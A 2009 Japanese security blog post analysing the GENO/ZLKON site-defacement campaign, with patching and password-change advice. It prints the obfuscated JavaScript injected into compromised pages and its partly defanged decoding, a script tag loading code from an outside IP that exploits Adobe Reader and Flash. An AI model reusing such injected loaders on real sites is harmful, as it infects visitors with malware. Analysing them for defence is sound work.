GENO(ZLKON)ウイルス 新たな脅威?
Published: 2009/04/16
GENO(ZLKON)ウイルス 新たな脅威?
最近、いくつかのサイトが改ざんされ、悪質なスクリプトを埋め込まれているとのこと。初めにPCショップの GENO で発見されたことから、GENO ウイルスと呼ばれているようです。最近はドメイン名にちなんで ZLKON ウィルスと呼んできていますね。ウィルス対策ベンダでは正式な名前などは決まっていないようですが。
GENO ウイルスまとめ http://www29.atwiki.jp/geno/pages/13.html
【埋め込まれたスクリプト】
html ソースには以下が埋め込まれていました。
<script language=javascript><!-- document○write(unescape('%3CsffqcffqriqOplc3t%20srNXcqO%3D%2FqO%2F9ffq4%2E24qO7%2E2Mnp%2E1NX95lc3%2FNXjZEfquNXeMnprlc3yffq%2ENXjsMnp%3ENX%3CZEf%2FMnpsffqcript%3E')○replace(/ZEf|MA7|Mnp|NX|qO|lc3|ffq/g,""));--></script>
これをデコードし、読みやすくすると、以下のようになります。
<script src=//94.247.○2.195/jquery.js></script>
このjquery.js をダウンロードしてみると、さらに別へのリンクでした。
<script src=hxxp://94.247○2.195/news/?id=100></script>
※一部.を○に変換しています またアクセスするタイミングによって内容が変わるようです
【スクリプトでの攻撃内容】
該当スクリプトへアクセスすると、Adobe ReaderやAdobe Flash Playerの脆弱性を悪用され、マルウェアに感染するようです。この Adobe Reader の脆弱性は、3/23 にJyake さんが書かれていたこちら?との関連性を確認してみたところ、転送先のドメインが一緒でした。3/24 には Adobe セキュリティアップデート情報も更新されており、被害事例が多数発生している以上、使用中のものが最新版であるか再確認したほうがいいですね。http://www.adobe.com/jp/support/security/bulletins/apsb09-04.html
なお、別サイトでは以下のような記述もありました。
>レンタルサーバの方から以下のメッセージを頂きました。 > >こちらでお調べしましたところ、お客様のアカウント、パスワードで >FTP接続を行い、ファイルに<script>などのタグを書き込むことが >行われているようです。 参考URL:http://d.hatena.ne.jp/abe_koji/20090406/1238976595
該当サイトはパスワードを変更しても何度か書き換えられているとのこと。これは管理用のクライアントマシンがマルウェアに感染していて、パスワードが漏洩しているんでしょうか。確かに攻撃者からすれば、 FTP 通信を監視してパスワードを外部へ転送していれば、変更されても対処できますしねぇ。ブルートフォースも必要ないし。
勝手にリンクが加えられているなど、自分が感染し被害にあっている可能性がある方は、ひとまずアクセスするクライアントPC&パスワードを同時に変更してみるというのも手ですね。同一ネットワークだと二次感染しているの可能性もあるので、できれば別ネットワークのホストから、SFTPなどFTP以外で通信を行うのがよさそうです。
By GGaT & Mudrock